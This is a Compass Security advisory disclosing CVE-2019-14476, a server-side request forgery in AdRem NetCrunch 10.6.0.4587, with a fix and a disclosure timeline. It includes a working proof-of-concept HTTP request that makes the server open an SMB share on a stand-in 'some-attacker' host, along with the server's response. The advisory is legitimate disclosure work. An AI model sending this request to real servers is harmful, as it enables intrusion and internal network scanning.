################################################################################ # # COMPASS SECURITY ADVISORY # https://compass-security.com/en/research/advisories # ################################################################################ # # Product: NetCrunch # Vendor: AdRem # CSNC ID: CSNC-2019-011 # CVE ID: CVE-2019-14476 # Subject: Server-Side Request Forgery (SSRF) # Risk: Medium # Effect: Remotely exploitable # Authors: Thierry Viaccoz # Sylvain Heiniger # Fabio Poloni # Date: 26.07.2019 # ################################################################################ Introduction: ------------- NetCrunch [1] is a so-called "agentless" monitoring solution developed by AdRem. It allows system administrators to monitor, visualize and get alerts from many kinds of systems in their network. The solution consists of a server and a fat client (also called console), as well as a web client. Due to its architecture, the monitoring server is a critical system as it holds credentials, most of the time privileged, for all monitored system. Compass Security identified a Server-Side Request Forgery (SSRF) vulnerability in the AdRem NetCrunch server. Successful exploitation requires authenticating as a user and can be performed remotely. Affected: --------- Initially vulnerable: * AdRem NetCrunch 10.6.0.4587 Not vulnerable: * AdRem NetCrunch 10.6.1.4607 No other version was tested, but it is believed that older versions are also vulnerable. Technical Description: ---------------------- Every user can trick the server into performing SMB requests to other systems. An attacker can exploit this to get access to internal files. Furthermore, this can be abused to perform limited internal network scans. Based on the returned error messages and the time required to perform a request to a certain target, the attacker may determine whether a given system exists and whether it is running a web application. Request to open the share "\\some-attacker\share\" on the attacker's machine: POST /ncsrv/dashboards/summary/rpc?api=ncsrv&sid=2120819038 HTTP/1.1 Host: some-server User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 129 Cookie: WASessionId=2120811535 Connection: close [{"action":"IServerFilesBrowse","method":"GetContentOfDirectory","data":["\\\\some-attacker\\share\\","",-1],"type":"rpc","tid":2}] Response showing that the request was triggered: HTTP/1.1 200 OK Connection: close Content-Type: text/json; charset=UTF-8 Content-Length: 159 Cache-control: no-cache Date: Wed, 31 Jul 2019 17:19:10 GMT Pragma: no-cache Server: AdRem WebApp Server [{"type":"rpc","tid":2,"action":"IServerFilesBrowse","method":"GetContentOfDirectory","result":{"Directory":{"Name":"\\\\some-attacker\\share\\","Content":[]}}}] By performing the request above, an SMB connection is opened from the NetCrunch server to the host some-attacker. Workaround / Fix: ----------------- Avoid using user input as a source for the target of a request or prevent access to this functionality if possible. As a NetCrunch customer, update your installation to the latest version to receive the fix. Timeline: --------- 2019-05-23: Discovery by Thierry Viaccoz, Sylvain Heiniger and Fabio Poloni 2019-08-01: Assigned CVE-2019-14476 2019-08-29: Initial vendor notification 2020-12-08: Coordinated public disclosure date References: ----------- [1] https://www.adremsoft.com/